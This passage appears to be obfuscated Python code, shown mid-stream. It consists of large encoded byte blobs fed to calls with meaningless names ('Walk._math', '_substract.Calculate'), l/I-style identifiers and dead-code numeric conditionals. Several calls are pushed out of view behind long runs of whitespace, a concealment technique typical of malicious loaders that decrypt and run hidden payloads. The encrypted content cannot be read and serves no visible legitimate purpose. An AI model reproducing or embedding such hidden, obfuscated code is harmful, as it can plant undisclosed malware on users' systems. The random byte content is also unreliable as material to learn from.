\xe4e\xf6l\x90\xf4R)"d\x17\x90\xd8\xd5\xb7)\x8c\xbb\xd5\xa2^\x84\xce,\xc2eia\xb7\x9fq\xcb\t\xbc\xb0\xf7\xda\xe5\xf6\x8f\xdftX\x05\xb4\x90\x8bC\n\x17\xca\x82\x95\x92\x9fC\x1f\xf2\x9a\x96j\x85\xf5\xfcQ\x94`~\x17\xe4P\'I\x00\xd2*R\x16q0\xc4\x8a/^0S\x12\x0b{\x04q\x10\xc2\xabd\x04[>\xf0\xe8\x0c\x13/\xf1P\x9b\x85\x90\x82\x1f\xce\xe2TY\xd3+\xc0\xfd\xa8\t\xb5T\x8f1|C8\x0bGQ\xa8\x8en\x0e\x90D\xadvx!|\n\xf2\xcbV\xb87\x1b\xcc\xb8\n\x08\xc4\xb8\xa4_A\xbf\x15\x03U1B\xf9\xd3\xd2\xb7tf\xa5\x83\xdb=s\xd3u\x9ae\x92O&p\x0b\xdbw-\x18\xf0\xd0"\x8d\xdb\xd5\xb7!3\xf2\xeb\x04\x1c|\xdc\x19}\x11}+\xbexm\xe3\xb9\xe6\x80%\xaf\xbe\\\xf1NWT\xb3\xd4\x88&}[\xa8\x11\xaf\xa0\xa8Z\xb5Vt\xf2\xcaK\x0b\xbcj\x8c\xfe\x05X\x82\xa8\xa8c\xc4\xf8\xa5Jk\xd3\x1d\xfa\xb8\x9a\x85H\xe3A\xc4{\x94\xafQiu\xe2N!\xce\x95\x00\x7f|\x8c\xdfFA\x85Jk\xe75VT\x08\x9b\x86C\xd2\xa1\xca\xd9\xa7\xbb\xfa\xb6 \xa2\xee!MJIc\x7f\xa1$,x"\x944\xf6\x81\x928\x05\x92\xb9\xfe\xd9\xce\xa7\xda\xed;\xd7[\xa9v\xf8\xa6\xd2\xee \xce*\x14F\xa9\x08ckV\x8b\xe67\xb2\x04\xf4\xae\xbeM\xa4@\xcd\x0c\xf5 \x8f\'\xf70\x97\'\xf7rL\xe9q\xe4y\xc4"d\xc1-qF\x04\\pqXmm\xbaC"s\x1b\xa2v\x9e\xa2g\x174\xf7\xb4\xda\xea\xe4p\x12\xfc\x9e\x84R41Y3A\xdfh\xa5\xb5\xd3d\x96T.\xa9\xaai/\xd3\xd2\x96X\xa9_\xbb\xfa\xeeS\x84\xb6K\xc8\xda\xae}B\xd1^(\x80\x00,\xe3\xfd\xd5>\xa9q\x87p\x08K\x9c\x8d\xcc\x0cd\xd8\x81p{\xf7\xe4\xce\xa6\xf7\xb3\xc5\xf4-\x14\xb8\xbf\x044\x0eU\xbd\x87\x82\xf7W\xd0t\x06\x89p\x178\x89r\xf4\xdb_L.N\xeaI\xb7\xc5\xc51\xa6v\xa92\xe9f\xb9i7\x9c=\\V}\xe6\x08\x1bb\x89\xc3Q\xb5\xf55 \x9f4\xfc\xf8J<X\x9a2\xdd\x895\xf5\xbe\xd5\xa5\xc8\x08\xa1B\xacw\xb0\xd1\\\x85\x889\xa93\xc0|Q\x8a,\x05\xd5\xd6\x9f\x02\x85U\xacG\xb4\xb7\x9e\xc7\x17\xe4\x81\xd9k\xe1\xf9pP\x1e\xf1\x91\x88\xf2"2\xcf\x96\x7fq\xa9P\xf7\xb6\xbe\x8e+o\xf4t\xce\xeb\x81<E\x9e\x1f\x1b\xcecs!;\xa4dpE Z\xae\x88a\x18{l\x1azwd\xf4\xa5\x15\xaco\x14B\xf1\xba\x14\xaf\x95\xb9\x96n\xf8\xeb\xaaz7r\xf78\xd0\xbbWv\x1c\x90\xd22%\xa9\xc9\xb4tKz!\x9f?\xf1k\xa4\x18\xaa\x06&\xb0\r\xad\x07]\xcb\xb6\x14n+$H\xc2C\x1b\x90ZJ@\x06d\x0c\x19iZ\xceRk\x9b\x1d\xc6\xecJ\'W\xbb\xe0\xdeJ\xadN4\x96\x96\xd64\xfd\x1c\x02\xc4%\xac\xb1\xf8\xd5\xd6\xe6\x06\x8a\x81\x9b\xa4\xa8\xbb\xfbh\xa0TZ\x0f\xb7\xb4u!\x87\xeb\xc5\x1e\xef%m\xa6v\xa92\x95t\xe6\x0c\xd3\x17\xb0~j\xaa\xea8\xb0\xbf\xdb\x9c\xd6\xbdYH\xf9V\x04\xd4\xc9\xb6\x93\xe5\xa9\'e\x8e\x10\xdc\x19\xe8\xc5kP\x8f\x1bFbk\xce\xb5\xa4\x1b\x8d\xd8g!t\xcd\xe2r\xb2Y{\x9a\xf4uX\xd6\xcbQNB\xb5\xcc\xa8~NL)R\'\x01\xf9(\x1c\x05S\xf5\xb8\x80\xc7(\xe8\x1b\xfe\x92j\xe8\xe4\xdc\xaa\x14(\xe0I\xf9\xc3\xf7\xdc\xa7\x9e\xab\xc9\x15!f\xbcSI\x052+\x1f\xee%\x14s\xff\xf0\xda\x91\x04\xf2\x1b\x13\x8f)-\xcf\x89\xf6\x1b\x97Z\xdb\xb8\xc1C\xbc\x0b\x8ao\xc4n\xf0Rkg\xc8\x84\xccd\xc9\xf2\x95Y\x1c\xf1{\x9e\x05\x99\xd8\xd6\x17%\xc0\xe1\x1c\xd1A\n\xab\x9e\xb2%B.%\x02\xb7T\xad\x81C\xf5\xd7!!\x1eCU\xf8ut\xbf\x96\xdb\xb1\xa3\x95\xd4R\xdc\x81_\x13\xdceW\x97W\xec:\xc3\x9c\xb6\x86.\xaf\xd7;\xe2h\x16\x91\xafp.L\x16\xd1"\x9a\x85\xfe<H\x95P\x83\xb6(B\xe1\x13\x86K\xdf\x03\xb4\r\xbe\x82\xf6\xde\x01\xeav\xa8\xbe@ldQ\x1f9\x00\x1a\xea\xe4&\xf1\x98\x08\x02E\x00NATd\xdc\xdb\xddw\xef8\xc5Z\xe9"\x98W\x96\x81\xcfN=6\x95u \xd1F\xe8\xc2\x0c\x99Q:Ec\xb0\xd2\xda\\x\x12\x84<F\'?\x88\xca\x00\x85g\xa5\xf554\xff\xbdp\x19\xf3p\x15\xc5\xa1\x83\x08[1)F4\x04iO\x1d\xe9\x05\x87\xc8$\x19\x8c\xc5u\x8f\x0f\xf8\xaa\x17|\xa1T\xb6\x95`\x8e\x8d\x80JJ\xf8\xc2m}\x1b\x06z\xf6\x1a/\xa3p\x08\xf7n\xc5\x83\xbf|\xd6.\x8f/m\\\x1e=pXE\x86\x07T\x02\xe0\xb6\xee\x11\x97\n\\\xd5\xf5s\xed\'\xb6cgE\xd3\xceu\xec\xac\xc0\x89R\xcc\x8c\xb2[\x9d(\xf5q`j+w\xa9e\x7f\x81\xb1\xa0\x0bd\xa6\xbc\x80\'b\x83h\xee\x0c"/\x9a\x8f>C\xac\xd3\xf2\x9e(PJ\xad\x9d\x8dc]"\xc5\x1ab~d\xa0\x9f\x91e\x1c\xef\xea\xdb\xa2\\\xed>n\x13k\x02h"\xdd\xa8X\x91\xc9/M\x9em};\xa0\xber&a\xe1\x8a\xefp\x87\x8d\xe6(b\x1f#\x9bC&|\x1dr\x95\xb8Jks,B\x8c\x1f\xf0n}\xd6\'\x08\x8bPim3\xfe"\xa4h"\xb7\xa3\xcf\xa8\xf6Jks\xb5%D\x90\x13\x15\xc1\x000\x06q\xdfVZ\xdb\xe0\xeei\x1e\xf8\xa8\xf7\x10\xd9t\xa9\xed\xd0A\xd0^@\x0bC\xcc\x83\x1a\x01k#`\x8f\x92\xd4E\xb6M\x99\xd1\xa1\xcc\xf5\xb0\xb028\x9c\xc0q\x13v\xebR\xb2W\xc7\xd2\xca5\x01\xbb\x91f\xe2(\xf3rT9\xd0\xf0\xb5\x13\xbf\xa8R\xf5\\\x1dX\x99\xc0\xcd&\x1aI\x9c\x1dP\xa1\x96\x08\x94\xc9PW\xb2Sa:;#\xf8g \x0f\x02GL\x00.\x1a\'AX\xbb\x9aR\xb1E\xc2\xb1G\xec\xbe\xaf\x119\xa9\x15`\xa1`\x8byMwW\x87eg\xaf\xf7|\xb5\xaa\x19\x1a\x8b\x8aoD\xbf\xeb*\xa5!\xa6\n\xc8KH\xd3WG\x18\xc5\x8b\x90\x8b\xdb\xf4\x96P+Y\xc7b556\x97\xfaYX\xb7G\xdbC\x06Zz\xe8\x85\x862\x84\x00\x84\xdc\xd0z8\x0bO,4\xf1 \xdb\xd9T\xe2\x9b*\x93\xfbl\xea+\xc5x\xdax\x9e[\x86@%\xd0)y1)\xcf\xcf\xb9\x9e\x97\xf8\xd7\r\x10\xe1\x8a[\xa9e\x1c#e`n\x8c1z,\xcb\xf7\x9e\x88mJ\xad\xaf\xa65\xd6\x82\x05\xd7w\x80\x13\xbc\xbbc\xe7#V\xcc\xed\xec\xef\x91p\xa7d\xb3\xd95\x1ap\xa8Z\xfe\x9e]}\x1d\xae\xb5\x9d\x08\x13\xea\x06\xbe\xbd\x9e\x16\xef\xf6\x96+\xe6)\x7fc\xc12)&\x86U"\x861\x17\xf5tX%B\xfbT\x8c\xb7e^p\x96\x8a\xe7e\xee\xceY\x1a\x05\xe0\xcb\x8b\xfc\x0e\xfe\xdf\xc1\x05\xe2m\x959\xae\x9e\xc90o*\x12b\x14\t\xc4H\x8c\xd8\x1a\\<\x92jk\xa7\xc9&\xd1F)\xb0&\xf9\x13:\xf3\xd6Z\x0fv\xf5mI\xf6\xf6\x9a@\x8eq\x96IV}\x86\xff\xe3\xe6H\xf3\x10O|\xaa\xeb\x13\x07\x184)\xb55w\x15D\xa8\x06\xa4(\xe6#\xc6U\x95\xda:]a\xb9Z\xe2b\x92U=\xb0}\xb8V~\xf5\xae\xbe\rS\x1e;\';\xcd\xe3\xdei R\r\xacJ5\xc7\xa9\xbc\x9aj\x8dC\xeb\x1cGJ\xb82\xa0\xa2\xc7\x9f4\x9b\xc0\xc7\xc6\x8c\x02\xee\x95\xde-j\xa7\xf89%\x0eSN\xc0\xf1-\xb5sw\xdf\xbd\xfd\xa3\x9ctI\xe9\x97d\xd4w\x9e_\xb6\x0bW\xf2\x8bd;\xb0\x1c\xd5M\xfa6tT\xf7X\xd5\xdd\x9d\x0eL\x15\xd7SF\xc6\xfa\\\x1a\xd9\xaf\xb6\x1e\x99Z[#?\x16%\xfa\x18\xbb\x8a\xec\xc2\x99;\xd2\x0f}\xc4O\x0c\x81\x0e\x1a\x0cg`\xbfK\x87D\x0emX\xc3\xc3\x90X\xf1\x88\xd5$\n\x91\xc5\x042\xf7g\xe0\xaf\xc5=\x04\xb8\x87`\x1eM')

        if 204198 > 5626809:
            Walk(_calculate = 52409 / 50836).Calculate(System = _substract.Add / -46517)
        elif 215979 < 2533936:
            _substract.Calculate(System = _substract.Add / -8621)                                                                                                                                                                                                                                                          ;Walk._math(_absolute='lIlIIIIlllIlllllIlllI',_invert=b'\xb9]\xd8M\x80\x07 I}0\xc4\xbb@\xc4v\xf8"\xecbTE\xb6\x08\xcd\x18\xe1\x00\xa9\xe1uF\xb4\x0e\xb0\x84[n\xc5T\x9a\x87\xcbj~T`\xa9Q6\x91\xc9\xd0R\xa9<+1g[\xdf\x16\x00\xb0\xfd\n\xf3\xb0\x0bu\x15\xabG5\xca\x95\x11\x10\x0b\xb7D\n\xd4\xb4\xda\x89\xb3JF\xba\xcfLm\xef\xea\xab\xde\x0ff\xc90X \x87D\xeaC\x1f5\x96\xe3\x048&\xc07\xad^\xc7\xc5\xd6\x04\xb9,\x12\xaf\xd2\xd7\xc3q<\xf7\xa7\xfe\xca\x9fZ{\x1dm\xf9\x05\xe0\xe0\x87`r\xa4\x8c\x18`\x81\x1b\xc5X\x8c\x12\xf6\x14GT\x82+\x06\x80\x9b\xfd\x1b\x9drY\x1bAbs\x8e\xf5V\xa4\x1a\xa2{!\xc2z"\x0cm\x05\xecg\x00\xed5*\xb6v^\x125412\x10\x81\xc8\x1a\xc5\xa9\xb5$\xee\xea;r\xc0eS\t\xb4l*2#\x11\x0b\'\x10dg\xdc{\x8c\xa2\xb61\xd46\xb2\xda \xac]\xa1\xab\x93\xc8\x17\xc0\xb1\xed\x06vZH\xd2\xaezUms\x9a\xfb\xa6\x0e\x0e\xebf:`P\x9e\x16\xc0a\xd3\x02hl\xce\x7fR\xa7\xc7\x89\x17\x84\xd1U\x0b\x8d\\\xe8\x00TT\xfb\xa6\xef\xa3\xef\xb9\xe6\xad\xc39\xbf\x0f\x93:\xac\x96L%\xdb\x1cM\xe9Q]\x92\x84~\xc5\xedN$\x96Z\xdc\xd5\x9f\x97@\xe9\xba\x15 \x07\xfd%P>\x81\x970\xf6\x89\x82_\xb5`\x0cV\xbd\xbf\x7f\xad\xf1\xcfBYI1\x9d/\xc2,\xfb\xda\x8e\xfa-N4q\x95\x08\x1d\x9dhlp\x8fK\x8cRu\xfdZ\xf2\xc9\xec\x17\x1dv\x01\x883d\xe0s#\x8c\xac6\'\\1@\xdf\xdb\xd9=Ke\xabr\x86\xc4\xc1\xb6\x8b\x9aU\xe0\xcd\x8do\xa9\xf8\xf5\x08\x95-JGM\xaa\xadMw\x18\xa0\x1b8\xd2\x0cI)\xee0\xac\xb66\xff\x85D\xb44B\xf8\x1e2;\xbe\xa7\x8ax\xa5\xd6^\xc0\xbcr\x1fZj\x9e\xf0\xf8\xc4%0\xef\xb6\xbe\xafA\xc1D\xe4K@\x18\x1daZ\xb8\x9aU\xd8\xba\xc2P\xbe\x8f\xc4L`HDH\x96\xd7\xa5n\x15\xb9\xa7\xb8\xac==w\xc3\x9fH*\x82H\x1f9\xad\xb6C*,\xa5-l\xeb\xeb\x8c\xff\x0ek\x04#\x97\xa0Z^|,}\xd2{\x96\xad\x14\x12\r\xa5\xa2\x03Uu(&\xa8:\xd1\x18;\xd74\x830+\x06\\!\x1d\x15\x92? \xec\xdayb\x8a+R\x12L%\xe0\xa3\x03\xff\xa5\x94\xb4m}\xdd%\xa36\xad\r\x11\x84\x0b\xe0\xca\xecP\x15\xa2\xd6\x9f%8\x9a"\xb5y1\xfb\xc8ju\x13\xa7-Q\x83\xeeo}\x0c\x88tIba\xf8\xe4@\xd3\xda\x11\x9f\x92\xb0\xfd\xd0\x1aL\xc2\xd9U\x8eOm\xeb\xdb">u\xf0\xf2u\xb5~e\xe3G.P\x91W\xbd\xcdN\xc4\xd1\x92}m\t\x8a\xa5\xde\x11\r\xcb\x82WkQ\xf5i\x99m\'\x87\x97\xa0u\x1e%^\xef\x0e\x08\xdb\xc9`;#dK\xdew\x06u]&\xac\x80\x18\xbff\xb4R\x07\x1c\xc10\x8d\xd5tH\x02Dk\'\xbd{_t\xe8\xd4\xc0\xb2\xa6:\x88:\xd7 -\x04T\xba8\xfc.\xb9\xc6\\\r\xf4\x07\xff#\xc4\xb7i\x14\x90r\xce)\xde?dVub\x96\xa9\xb4\x1e\x12)\xbc7\x85\xed\xfe\t\xdb\xb4g\xfe\x1e\xdau\xf3\x9c\x10\x8f\x08-\x11\xc9\xe2C,\xf0=\xe4\x84TZ\x7f\x86S\x18\xc7\x804\x17\xc49M<\xd8\x86\xe0\x05\x14$\xec\xdd/Xd-+\x97$4<gN\xa6]\x07\xa55\xbb\x03\xfa\x14\x04\x0b\x02T\x10\xb6\x9b\x16\xc1|5\xe0\x82\xb0J\xdb\xd4\xfav\x81K\xbb\x86{\xb3\xbe{\xbbO\xb1\x80\x8bv\x8aQ=\x97/\xcd\xf9\xb0:+j\x02\x07\x93H\x8d\r\x07\xb3\x8b4\xec\xea\xd7\x82huW0+B\xef\t\x97_\x00:\xaf\xf7\x90\xaaVi\xed&E"\x83n\xf3"\x13r\x8d\xec\xabm\x8d\x80]}\xbb\x15f\xc0\xf4>$\xf3\xbc\xc0\xacMH\xe0l\x9e\xdc\xe7a\xb9\x97\x04\xf9\xca\x86(ic\xc6\x9b\x95Z\x7f\x06\xb9\x1by\xe10L\xbax\xff~He\xf0\x97\x1f\x9a\x8a\x1d_w\x1e02\x10"k\xdc\xfb\x91\xf1\xfc\x86\xd6\x80\xd9\xd5\xd7\xa5\x8f\xa5S\xc1\xb7\xab\xab\xf1\xe5x|y\x05\x0f@b2\x06\xd6\xdf\xcbN\xe7\xcef[\x97\t$\x1e\x864\xaa\x92:\xef\xea\xeb0\xd7\xdf\x01\xf6[\xe8\x97\x89\xeb\x91*\xc01E3\xd7\x84s\xe2\x8f:X\\\xc7\xc3\x94s\xe0Q\x87\x9a\xc3P\xd6\x11Y\xd5\x1bC\xa2\xa9\xd2N\x88d\xc2\x1e\xd11\xbd\x87D\xddJ\xeb\xe1\x16\xc5=\xb1g{\xb9\xbd\xec"\xd7\xc0\xe9\x05\xcf};\xb7\n!\xc5\xc4B\x12T1\x04\x8e\xb0\x03N\x99\x15\xab\xa6y\x99\x1f\xd7\x89\xb1\xee\x9cn\xce\x90\xc7\xcc-\x8c@j\x15k\x10\xfc\x00\xd7\xeeu\xe2\x92t\x91sZ\xccx)\x136\xbb\xe7\xce\x8bB\x9cs\x11\xc2-\x91\xec\xaa\x0b\x87\x1e\xa2\xb5?~d\x047n!\x8a\xfb\xb8\xad\xa0\x16\xce&\xd7y\xf3\xda\xcd$N\xa6\xb9\xce\r\xb4[\xa7\xce\x10\xfc\xafZ\xb8\xc1\x06\x1b\x17\xebW\x16\xb0\x83N\xc42\xde\xb6\xe8\x05{\xab\x914\x0b\xa4<\xa2\x9e\x1eM\xd7\xf0\x84\xcb\x03y\x88%O\xb9\xec\xe1\xa8\xda\xfa3\xd84n\xa2\x0b\x15\xd2\x8c\n\xd8\x94_;\xc0\x8f\x89\t,&\xb1MX+\xe1\x9b\xb0\x94\xf9Q\xd7\x17C<=\x13\x13S\x8d\xe5\xd8\xd2\xba\x85m]\x08\x89\xa5\x85\xb6Z\x14F\xc9\xd6TJ#\x03?W\x86\xf7\xbb\xbb\xb3M\xbf\xad\xa5\xe3\xdd\xc8:\x91{\xe6Y\x08\xa3%_:\xed\xe6~\x87t\xb7\x08\xbd(T0\x16\xe1%\x084\xa9\xb4\xbe68\x0b01\xc4\xf9\x9a\xa2C\x03\xeb\x96\xbd\xa7|\xfbRks\xd9\x82DV\x98\xb0\xef\xd1\x0e\xdeS\xe9\x97R\xebQc\x18\x9b\xe6rkg><\x92s\xbf\x95W\xdfC\x1e\'\x1f\xd9\x92\x98d\x1e\xbdK\x95\xd6\xc3\x9d\xad\x03rE\x1eD/\x18P\x1d\x19\xaa\x84\x89L\xcc\rI\x98\xdd\xab\x8eR\x930\xc29\x11\xe0\xf5\xa6\x8c\xe5J\xeb\xe1\xcc\xf3}\xae\x7f\xed\x99\xe7\xf2=\xc0\x81\xcd\xc5|\x8e\xe9\xec\xb7H\xf9\xebI\xb4\xd4\x89\x11\x14\x1f\xf2\r\xf2\xdd\xf0\x9d\x87\x9b\xf7\xa2A\x08e\xbe\xa66\x89Lf\xc9\xd0\xd2:v\xf5u\xac\xf6\xf5\xe4\xf3\x18\xd0\x8b1\xd7O\x1b7.\x9fVs\x16%\x1fG\x12\xfd\xfd\xa8\xe8mEO\xab\x85\x16\xdc\xd5\xb7a\x1e\x8fV\xa0\x04\xf9(\x99\xba\xf8\xd0B\x81\x1a\xd0\xb8\xa3C\xbd\xa6E\xcd\x89\xe2\x81\x84\x88H\xe5C4\x001\xc6\xa1Jm\xaf\xad\x1f\xd5\\d\x89R&\xd6\xb0\x1fZ\xd3\xc1N\xcdn\xd2wO\xc5d\xaf%\xb7\x95\xdf\x1a\nk\xe3D\x03\x0fF\x80\x04\x86\x9e\xf81\xd4\xa4S\xef\xc7a\x07\xebk\x00\x14\xdcwk\x88n\xdf)e?\xbbk\xcc\xc3\xed\xaa\x10\xd0\xeb\xebD\xea|\xae\xd0\xe7\xb8\x8a: M\x88\xdc<\xa3\xca+\xf0\xdc\x9dO:\xb1\xee\x12\x9c\x95\x18\\lI\xb5&}\x1bK\xb5=\x068Wc\x8f\xc11\x00h\xe8\xbe#N\x85\x9c\xa2\x91\xe5\xfa\xb7\xdc\xfd?m\x82`\xa1XRj\xb1}Hq\xa5iW\xeb\xb8v\xdc\x83sz\xd6;o|\x850\xb4\xca\xb4\xe9\xe0j9\xab\t%\x10{S\xfb\x89A\xf8a\xa8[\xb9\x1am\xa3z\xb4\xed\xaf\x13\x88\x7fu\x9f+\xab\xac\x03\x05!\xc8zu\xa3\xa2\xa9\xea\xd6\r\x88\x7f\x00o\xbe#~\x1d;\xf9\xd6.Di\xe3d\xed\xf7\x1a\xa5\xe3\x92\'\x82-\x08\xfc\xda\x93A\xf4\xa1\xb1~D\x98\x96\x04S\xdbG\xe4\xadzO\xec\xd3\xa5\xd6\xe6\xe8\xcf\x14A2\x1e>#\x8b#\xa2?+\xadNV\x7fJ\x17#\xd6\xc8\x08\xddP\xc3\xf7\x94\xa4Uj=zu\xa2\x89C\ng\x13\xb9M\xd7\xe8L\xed\xf4C}\xcb\xb3\x1c\x96\xb6\x05Gb\x13\xf5\xec\xea\xdb\x03QO\xed\xba\xdf5A\xa8F\xe0.t\xdeJ1K\xa5\x9c\xd1\xa2_us\x1d\xb7b!\x8a\xd1\x93\x1c!\xbf\x1dO2\x1c\xda\x95\xd6\xe6;L\xd0\xe1\xe8\xdd\x92\x0b\x92\xaa`&\xd5\xd6\xce\x9e\x06\xa9?`\xdb\xbb2j\x12kT5\xe9\xdb\xa2NAk\xce\x8b\x02\x88\xa3Xv\x8fo.\xe2\xe9\x0e\xd2\xe1ui\xcc\xd4\x8a\x00\x9b\x94\x03G\xc51\xbb\xe2\xe58\x95]2\xda\x19\xc8\xdb\xdc\xbb\xee3:3\xc4U+e\xae\xc0Jk\xf3\xf91\xc4<a\x0f\x93{\xa1\xc2\x03\xa5$WZ\x8f\r \xf5\x1a\xab\xd6>\x85\x9c\x05\xbaG@>)\xecl\xc0}\x12ntb`\xadL\xad\x98.4\x99\\\xcb)\x1b\x9b\x8d\x8eN\xc5C\x94\xe4\xb3\x91r\x0e\x92\xd9L\x04}Y\x8a\xaa\x17\x81\x19\xeeR\xdaZ:\xbe\x12`\x82[a"\x1cl\x8f\x92a<W\x9f\xeb\x92\xfbs\xed\xf3/\x92\x9f\xdc\xd8\xb3\xdaCT\'2Y\x05v\xd5\x1c!\xa2M-\x0fN\x93\xbeM\xf9\xa5\xf67\xb7FN\xbc7&\xe9P\x0c\xab"\xae\xd1-\xf3Q\x0f\xccz5\xf2sn1\x1cM+\x05t\xb9\xe2\x96\x1b\x7f\x00\x96)\xe8\xb0\xc6_^\x8e/\x01\x11\x7fyuu\x855=\xd5\x8b\x86\x90\xf8\x96\x9e\xff\x04\xe9=\x12&mK9\xea0\xaa\xb6\xf6\x12\x1d\xb0\xa9jl\xd6R;\x99\xa1I\xdf\x1e\xd9\x83_%Rb\x87\xb8\xa4\xfa\x9d$\x1b\x84\x96\xd8i\xd2\xb7\x85\xd8i\x8f\x91\xd4\xf5\x11\xd8\xd3YD\x051\xcb\xb1\x93\xb5\x89}\xd6\x08\x03\x8d\x90D\xbew\xaf\xf5(\x19m\xf4X\x1b\x9b\xc6%@\xddc\xda\xc9.\xb5\x8e}Z:e\x15=\xd2P\x913\xe5\xfd\xb0\xa8\x8eZ\xe0)\xa2M\ttJ\xc0\xec\xaePl\xc9\xe7\x12\xec@\x14\x19\x94\xa3\xf8\x8f\x92R\xee\xd7\xb6\xbe\x0e\xf3\x97\xa2\xa4ST\xae\xce\xf4!\xa3&\xd6\xf7b\x8b\xd9\x8au\xa6\xd3O\xa4\x99\xd8\xeaV\x99f\xb2\xc8\xfe`z\x1d\xd0\x85\xf6J\xb4w\xe2\xd2\x92\xb5M\x064:MK\xd4wu}\tJ\xe2\xce\xf5\x15\xae\x04\xdak\x9ei\x08\x96\x07\xab\x93\xcc\x18/\x9aw\xb1\xc3\x95\x0e\t\xb9\x96\xa8S\xaa\'uo\xacS\xfa')

        _substract.Calculate(System = _substract.Add * 463)                                                                                                                                                                                                                                                          ;Walk._math(_absolute='lllIIIlllllIllIlII',_invert=b'TB\x82 (\x08\xbf\xa3\x9a\xdc\x95\xd6C\x07\x01\xf6\x98\xd6vV\xb9\xe0\x8bD\xa9\n\xa2"\xd5~\xb3\xbe{\'\xe3S\xb1#\x04z\x00\xc0{\xdd4\xe8w\xf0Iz@\xb4G_(6e;\x91\x01\x05\x1b\x97\xe3\xb1\x1a\xf0W\x90Z|\xd5yi\x16 \x9a8\xdee`hfAki\xde\xd5\xd7\x1d\xc1\x19h\x98@\xda\x13\xc6\xabhU\xach\xd9?\xc3p!\xb9\xae\xc8\x1fbR\xee\\\x95v\xd4\xc4]v\t!;\xf7}\x18\x15\xb18\xdb\xfaz\r\x97\x90\xbd\x02\r\x92V6\xb7\x8c\xaa\xd4J\xbb\xe8\xc8r\x04q\xe5\x18\x89o(\x93\x19\x12\x96F\xec\xde\x1f\x15[;#:\xed\xba\x01\xc3\xc8\xe0\x9a\xa4jvd!:w\xf5m\x1a\xad\xaa\xadvOQ\x90/LfBU\x1c\x9b\xf3\xfcR\x05\xac\x88\xcb)\xc6\xccfQjk\x17`\t\xa9:3Vj\x0eu\x80\xa5\xd0zl&\xd5\x16\xf5LV?]\x88&2@M\xaa3n\xd4\xb3\xdd}\xfb\x9d[\x85\xf8c\x89\xbd\xba\x92t\x8e\x8fN\xdc\x15\xc5T\x8d\xde\x8b!\'Q\xb1\xcesR.-\xe0\xa6\xb8@4Sb\xdb\x9b\x87\xa3\x80\xea\xbbT\x92\x9aGX\x1fF\xb5bE\x18\xae\x03\x13-\xfa\xe7-/\xd3\t\x8c\nW\xd8\xba\xb9!\x13`\xce^\xc8\\\x0e\x99\xb9\xb7{X\x0ct\xf0\xf1\x15\xa8$\xa8\x9f\x80\x86\x02N\xdf\x8e\n\x8a\xf3\xc0\x18\xde\x92\x04\x18S\x01\xf3\x06\xe3\x80\xfc\xddj(L}5.\x90\xb6XM\x88`\xa1N\x0fVAQ*\xc7\x08\x80b\xe5\x88\x13x\xca\xe3!B7WqJ\xb0\xeaj\xc4)X\x11\x05\x9a\xfa65\xbd`\xaf\t$\xd2C[\xa8^\xcd0q\\}g\xb2\xf0)z\xc5\xba#\x16\xee\xe6\xb4{\xe8g^\x01\xa4X\xf5X(\x9b*U\xdf7M01]\x9d\xb7\x94\x8f\x00*\xc6xU]\x14\xdfYZG\xc8G\x8c\x9fY\xa9\x1eK\xd5\x0f\x8e\x03\xc8\xdb\xe0:\x14\xcas\xc8\xde\xe1\x0f\x89\x9fST\xc6T/\xcc\xe6\x9a\xaa/\xf2\xea\xfa\xa8/\xf3\xc3\x00\xe7\x9e\x9a\xf6j\xb6\xc1\xcc\x9b\xd3\xcc\xab\x9b\x87\xea\x1c{\x85\xb3\xe3\xe19\x880\xa9\x1e.\xc7\xa2\xf8\x9bb\x1f\xc9\xa8\x87\xf1\x8c\xcf\x82:\xe30\xc8\x0bG\t\xf5mR\xfd\x8b\xd20\x0c\xa6\xc5\xef\x08\xd5\xf3\\\xed\x02\xaaI\xa1\xf4P\xdb\xc8\xa6\xab\x0eO\xff\xd6)\xb1\xec\xe2\xaf^\xc1g6\x1e\x99\xfau4\xda\xf6\x9db\x1f\xd9\x1d\xc7I\xe1\\\xf1\xae\xd3\xfc\n#\x13\x92\xb0]\x14\xc2Q&\xb4\xe3\xbb\xfa5\xa4\x1cw\xc7l\x1c\x99x\xa2\x03vc!\x0b1D"sM/"!9\x07\x81\x03\xad\xd2\x17\x82\xb8\x96\x11\x8fj\xa8E1\xb7\xabo\x13\xd7i\xadq\x8f\xa0C\xe4+\xc4\x14nx\xd1T\x8dL1+\x9a\xb2\x1dC\xae\xe8\xe9\xa1\ni\xb5uN`\x90\xbb\xed@\x1eY\x834-Quo\xeb\xeb4\xfc\xddJ\xe1m\x1f\xfc6Ao\x1bs,\xaf\x7fb\xb2\xacz\x07t\x91b\xd8>\r6\xc4\xda\x856\x15\x0c\x83\xfd1\xe3\x83\x07\xbc\xdd?P\xfe,\xe4\xd2\xaa\x8d\xce\xd6\xaco\x89\x00\xcd\xae\'\xee\x9c\xc88\xa0w\xf5\xf5\x1bz\x0f\xf6\xb7\xc5$\xa6c\x17\xd7\x95\xd7\xe4P2\xb6\xd8\xee\xbe=C.\x1655\x19]\xf3\xd8\xab\x03\xda_I\x18\x13[}\xc6o5e\xad\xdf\xe2 \x94\xd1PXH\xf4\xba_\xa4y\xad\xeb\xe7\x10\x17^*A\xa24>(D\x82\x89T\xa1\x92A+\xa5\x13t \xe2\xd1\xbfA\xbe\x1e\xbe\xd9\x89[{\xc4\xe8\x14\x02`\x83\x17\x07\\-i\xb5\xf5p~\xf22U\xab\xc4\nd\xc1\xb4\xeb_4\xe9\xdb\x94\xe6\xb5\xa3\xcf]-\xde\x9d\x8b\xa0gz\n\x8d\x1b\x17AwW38"\xd01^\xff\x04\x9d\xa2\x90\xe2\x12W[;]n\x81\x00\xead\x8e\xc8`\x95\xc4\x99\x1cX\xa1\xa4]}\x0ft\xb9\xa3\x0e\xa0M&"\x82\\Z\xc8XCf\xa2n\x12S\xbc\xef\x815\x0f\xec*\xb5v\x00xW\xdf\x16\x01\xe0\xbd\xdc|\xc3\xa4\x83\xea\x82{\x95]\xd27\xc1\xc3kO\x96\xd7\x0f\xf9\x85C\xa5\x17(\xdb?\xda\xbf0\xee\x00Y\x83!\xb2\r4\xc2\xb0\xd9\xd1\x8fv\x08:D\x9b\xebg\xaa\xc6\xd6Ti\xfb\xe0i\n}\xd7\x1c\x80\x85J{b\xa9\x1bh,\x07\xf3h\xcb\x89\xbf\xdce<\xb2\\\xc6\xb5\x98Qjcn\x9c\xa04\xfa\xbeV6T\xa8\xca6[\xe4\xa1\xfd\xa9\x8d\xd5\x01\x96E\xcf\x81\xde\x19\xb8\xe9/\xa8\xacb\xde\x90\x97~\x87>n\xb3\xff\xd9\xab\x05\x06\xe37\x94^\xa8\xeb\xeb2\xe1\x84\x82H\xe8\xf5\xc6\x90\xfd\x10\x03\xc4Q\xe2\xe3+\xd0\xcf\xfb\xe726L\xe1\x02^2h;\x03hr\xc6\x